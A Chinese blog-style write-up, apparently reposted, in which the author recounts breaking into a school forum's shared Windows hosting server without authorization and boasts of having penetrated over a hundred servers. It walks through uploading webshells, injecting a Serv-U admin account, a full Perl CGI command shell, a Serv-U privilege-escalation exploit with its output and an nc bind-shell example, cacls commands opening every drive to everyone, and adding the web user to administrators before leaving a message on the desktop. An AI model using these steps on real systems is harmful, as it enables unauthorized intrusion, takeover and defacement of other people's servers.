入侵一個管理員設(shè)置的超Bt服務(wù)器
發(fā)布日期:2021-12-28 01:08 | 文章來源:腳本之家
以前入侵少之又少,都是研究這樣研究那樣,實戰(zhàn)經(jīng)驗太欠缺了,所以決定暑假惡補一下滲透技術(shù),順便又可以看看國內(nèi)主機的安全性。暑假 6 月整整學習了一個月的滲透,從 xiaolu 身上學習到不少好的思路和經(jīng)驗。在此謝謝xiaolu 了。
一個多月的時間里,滲透過上百臺服務(wù)器,有獨立的,有虛擬主機的,有群組的,有國內(nèi)和國外,我發(fā)現(xiàn)一個極其嚴重的問題,國外的服務(wù)器,普遍安全性都非常高,管理員的安全意識非常高,做個比例,如果國內(nèi)平均每 10 臺服務(wù)器,能滲透進去 6 臺甚至更多,那國外、臺灣的,平均每 10 臺服務(wù)器僅僅能滲透 1 臺。當然我的水平也是一個問題。可是卻反映出國內(nèi)的管理員的水平的的確確比國外的要差幾個檔次。國內(nèi)的管理員的技術(shù)和意識,迫切需要大幅度提高。
不過國內(nèi)的也有比較 BT 的管理員,我就遇見幾個服務(wù)器設(shè)置得非常。其中一個的 Documents and Settings 目錄下還有 nsfocus 目錄,難道是 nsfocus 公司幫做的安全?這個服務(wù)器我們沒有拿下,還有另外一個,就是今天的重點。
一次看見了一個學校論壇(http://www.*****.com),還蠻火爆的,頓時興趣來了, ping 了一下,發(fā)現(xiàn) 4 個包都返回 Request timed out. 估計是搞了策略或者防火墻的,象我這種以 Web 安全的,自然喜歡從站點上找漏洞,自從學習 Web 開始,我就落下一個怪癖,就是如果實在從 Web 上找不到什么漏洞,寧愿放棄也不用什么漏洞掃描器。
大概看了看站點。就是一個論壇,采用 LeadBBS ,拿這個論壇沒轍,還有其他辦法,因為剛才我訪問這個 IP ,返回“No web site is configured at this address.”,初步判斷是虛擬主機,前段時間那幾個黑站狂黑站的成功幾率為什么這么高?因為有 http://whois.webhosting.info 這個網(wǎng)站,可以查詢一個 IP 上,綁定了多少個域名。如果真的是虛擬主機,這個學校論壇沒有漏洞,不代表其他站點就沒有,很快的,我就通過一個小公司站點( http://anyhost/ )上的 DVBBS 6.0 傳了一個 aspshell 上去,誰知道僅僅能夠?qū)ψ约旱哪夸涍M行操作。而且自己的目錄沒有執(zhí)行程序的權(quán)限,又用不了 Nfso ,手工跳轉(zhuǎn) URL 中的目錄,也沒有多少個可以瀏覽的,重要的 Program Files 和 Documents and Settings 目錄都看不了,從 aspshell 反饋的信息來看,每個站點都設(shè)置了單獨的用戶,似乎一切都陷入僵局。
沒有目的的跳轉(zhuǎn)目錄著……
我習慣性的在 URL 跳轉(zhuǎn)到 c:\php,沒想到居然可以看見了,那這個主機很可能就會支持 php 了,馬上傳了一個 phpspy 上去,非常幸運,順利看到了登陸入口,可是沒想到進入以后才發(fā)現(xiàn),php.ini 亦設(shè)置得異常 BT,安全模式打開了, phpinfo 函數(shù)也被禁用了,看不了詳細的系統(tǒng)信息,不過看 phpspy 自帶的探針可以發(fā)現(xiàn),allow_url_fopen、display_errors、 register_globals 統(tǒng)統(tǒng)關(guān)閉,system、passthru、exec、shell_exec 幾個函數(shù)都無一幸免的被禁用了,直接跳轉(zhuǎn)目錄還是只可以看到這些目錄而已,各個站點的目錄都是類似于 “D:\websites\school.com#dlfjurdlkfjk” 這樣的,每個站點目錄后面的那些字符串都不一樣,也跳轉(zhuǎn)不到,后來我猜測后面的字符串就是 ftp 密碼,試驗了一下,無法登陸,看似柳暗花明,希望又破滅了……
結(jié)束了嗎?不,我試著 FTP 一下:
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版權(quán)所有 1985-2000 Microsoft Corp.
C:\Documents and Settings\Administrator>ftp www.*****.com
Connected to www. school.com.
220 Welcome to FTP Server...
User (www.bjtrq.com:(none)):
331 User name okay, need password.
Password:
530 Not logged in.
Login failed.
ftp> bye
221 Goodbye!
從返回的信息判斷,我們還是有希望的。盡管他修改了 FTP Server 的 Banner,但是從 User name okay, need password. 這句我們還是大膽的判斷這個服務(wù)器就是采用 Serv-U ,我上手有目前所有版本 Serv-U 本地提升權(quán)限的 Exploit ,如果我能傳一個上去,并且能夠執(zhí)行,一切就明朗了。再仔細想想有哪個目錄可以寫的?當時在 c:\php 目錄下沒有發(fā)現(xiàn) sessiondata 目錄,而且也不是自動安裝版,估計管理員把 session 的目錄換到其他地方了,不然這個目錄是 everyone 可寫的……
原來我還忘記了一個最重要的目錄, C:\Documents and Settings\All Users ,從這個目錄可以知道很多信息,這個目錄一般、至少都是 everyone 可讀的,這樣我們就可以知道好多有用的信息了,直接通過我的 aspshell 手工跳轉(zhuǎn)到這個目錄,呵呵。馬上看到了想看的目錄樹。
Application Data
Documents
DRM
Favorites
Templates
「開始」菜單
桌面
馬上試試建目錄,可惜里面的目錄包括子目錄都無法新建, BT 管理員權(quán)限設(shè)置得還真嚴格,不過我們還是有收獲的,那就是 “C:\Documents and Settings\All Users\ 「開始」菜單 \ 程序 \”目錄里,看到了很多決定結(jié)果的有用信息,
ActiveState ActivePerl 5.8
Administrative Tools
Deerfield.com
DTemp
IPSentry
MBM 5
NetMeter
Network ICE
Persits Software AspEmail
Persits Software AspJpeg
Serv-U FTP Server
Symantec Client Security
Windows 優(yōu)化大師
WinRAR
啟動
管理工具
附件
呵呵,現(xiàn)在我們知道了好多有用的信息了,看著這些東西,可以看得出管理員對安全、效率很在意,裝了 Perl,也就是說可能支持 cgi 了, IPSentry 這個可以實時檢測網(wǎng)站的各類服務(wù), 當某服務(wù)停止時, 該軟件會打 Pager, 或 EMAIL,或發(fā)聲,或運行其它軟件來提醒管理員,確保服務(wù)器出現(xiàn)問題能及時處理,說明管理員比較負責任,NetMeter 可以對網(wǎng)絡(luò)流量進行監(jiān)控,裝了黑冰防火墻和諾頓殺毒服務(wù)器版,說明管理員對于服務(wù)器的安全是很小心的,這還不算,還裝了另外一個防火墻—— VisNetic Firewall,真是 BT 到家了,裝了優(yōu)化大師,看得出這個管理員還是比較愛清潔的。從管理工具里面我們還看到了終端服務(wù)客戶端生成器.lnk 、終端服務(wù)配置.lnk ,還有終端服務(wù),這下好了,說不定順利就可以多一臺 3389 肉雞了。
先通過 aspshell 下載 Serv-U 的任意一個快捷方式,然后本地查看屬性的目標,呵呵,原來 Serv-U 的目錄是 "C:\Program Filesewfq4qrqtgy4635\Serv-U\" ,這下好了,直接跳轉(zhuǎn)目錄。OH~,yes~~,看到了,馬上修改 ServUDaemon.ini文件,這個服務(wù)器居然放了 280 個用戶,狂暈……不管了,先在添加 [Domain1] 里加一行:
User281=angel|1|0
然后加上
[USER=angel|1]
Password=ng98F85379EA68DBF97BAADCA99B69B805
HomeDir=D:\websites
RelPaths=1
TimeOut=600
Maintenance=System
Access1=D:\websites|RWAMELCDP
SKEYValues=
添加一個 angel,密碼為 111111 的用戶,具有最高權(quán)限執(zhí)行,然后我們就可以 ftp 上去 quote site exec xxxxxxxx 了,嘻嘻偷笑中……
不過殘酷現(xiàn)實再一次粉碎了我的計劃,修改好文件以后提交,居然是沒有修改成功,看來還是權(quán)限,權(quán)限權(quán)限整慘人啊。
不過還是有希望的,因為剛才我們看到了系統(tǒng)裝了黑冰,有些版本存在“ISS RealSecure/BlackICE 協(xié)議分析模塊 SMB 解析堆溢出漏洞”,可以遠程利用的,手頭上沒有編譯器,沒有辦法編譯代碼。
還有就是 Perl,這個是個很大的突破口,因為 Perl 目錄一般要 erveryone 完全控制的,不管他用 isap 還是 perl.exe 一般都是可寫、可執(zhí)行的,馬上下載 Perl 的快捷方式來看看路徑,呵呵,看到了,原來 D:\user\bin 就是存放 perl 的 bin 目錄下的所有文件,這么說這個目錄可能可以寫,也可能可以執(zhí)行咯,馬上傳一個 su.exe(針對目前所有版本的 Serv-U 本地提升權(quán)限漏洞)上去,呵呵,傳上去了,太好了,現(xiàn)在就是執(zhí)行了,剛才我們試了 aspshell、phpshell 都不行,現(xiàn)在就看最后的希望了,找呀找啊,終于在我硬盤上找到一個 cgishell,很老了,文件日期是 2002 年 6 月 30 日的,代碼如下:
#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);
$Content$
= $ENV{QUERY_STRING};
s/ / /ig;
s///\//ig;
$execthis =
$Content$
;
syswrite(STDOUT, "
\r\n", 13); open(STDERR, ">&STDOUT") || die "Can’t redirect STDERR"; system($execthis); syswrite(STDOUT, "\r\n
\r\n", 17);
close(STDERR);
close(STDOUT);
exit;
我用過最好的 cgishell ,保存為一個 cgi 文件執(zhí)行,暈……居然不支持!一陣陣郁悶襲來,2 秒鐘的郁悶后,想到還有一線希望,那就是pl ,我們還沒有試試 pl 擴展呢,把剛才的 cgi 文件改為 pl 文件,提交 http://anyhost//cmd.pl?dir ,我的天啊?。?顯示“拒絕訪問”,終于可以執(zhí)行了!太興奮了,馬上提交:
http://anyhost//cmd.pl?d:\user\bin\su.exe
返回:
Serv-u >3.x Local Exploit by xiaolu
USAGE: serv-u.exe "command"
Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"
嘻嘻~~現(xiàn)在是 IUSR 權(quán)限,那又怎么樣?看你這次還不死?提交:
http://anyhost//cmd.pl?d:\user\bin\su.exe "cacls.ex ... T /G everyone:F"
http://anyhost//cmd.pl?d:\user\bin\su.exe "cacls.ex ... T /G everyone:F"
http://anyhost//cmd.pl?d:\user\bin\su.exe "cacls.ex ... T /G everyone:F"
http://anyhost//cmd.pl?d:\user\bin\su.exe "cacls.ex ... T /G everyone:F"
返回下面的信息,就表示成功了?。。?Serv-u >3.x Local Exploit by xiaolu
<220 Serv-U FTP Server v5.2 for WinSock ready...
>USER LocalAdministrator
<331 User name okay, need password.
******************************************************
>PASS #l@$ak#.lk;0@P
<230 User logged in, proceed.
******************************************************
>SITE MAINTENANCE
******************************************************
[ ] Creating New Domain...
<200-DomainID=2
<220 Domain settings saved
******************************************************
[ ] Domain xl:2 Created
[ ] Creating Evil User
<200-User=xl
200 User settings saved
******************************************************
[ ] Now Exploiting...
>USER xl
<331 User name okay, need password.
******************************************************
>PASS 111111
<230 User logged in, proceed.
******************************************************
[ ] Now Executing: cacls.exe c: /E /T /G everyone:F
<220 Domain deleted
******************************************************
每提交完一次都稍微等一下,因為這些命令需要時間處理的,不一會兒,就把所有分區(qū)設(shè)置為 everyone 完全控制了,可以任意操作硬盤的東西了,但是有些命令還是受了限制,因為權(quán)限還沒有提升,現(xiàn)在我們把自己的用戶提升為管理員:
http://anyhost//cmd.pl?d:\user\bin\su.exe " net l ... s IUSR_anyhost /add"
現(xiàn)在我們通過 web 方式,執(zhí)行的命令就是以 administrator 的身份執(zhí)行的了,相信到這里,下面的事該做什么,大家應該知道了吧?馬上找到那個學校的目錄,進去咯~~目的達到了,本來還想做一個 3389 的肉雞的,想想算了,這種 BT 管理員的地盤,我也占領(lǐng)不了多久,留點提示到他的桌面就 over 了。
說真的,搞安全這么久,從來沒有遇見這么棘手的虛擬主機,要不是裝了 Perl,還真是束手無策!本文技術(shù)含量不高,只是分享一下希望其中的思路,如果有一個人從中受益,這篇文章就完成它的使命了。
版權(quán)聲明:本站文章來源標注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請保持原文完整并注明來源及原文鏈接。禁止復制或仿造本網(wǎng)站,禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像,否則將依法追究法律責任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學習參考,不代表本站立場,如有內(nèi)容涉嫌侵權(quán),請聯(lián)系alex-e#qq.com處理。
相關(guān)文章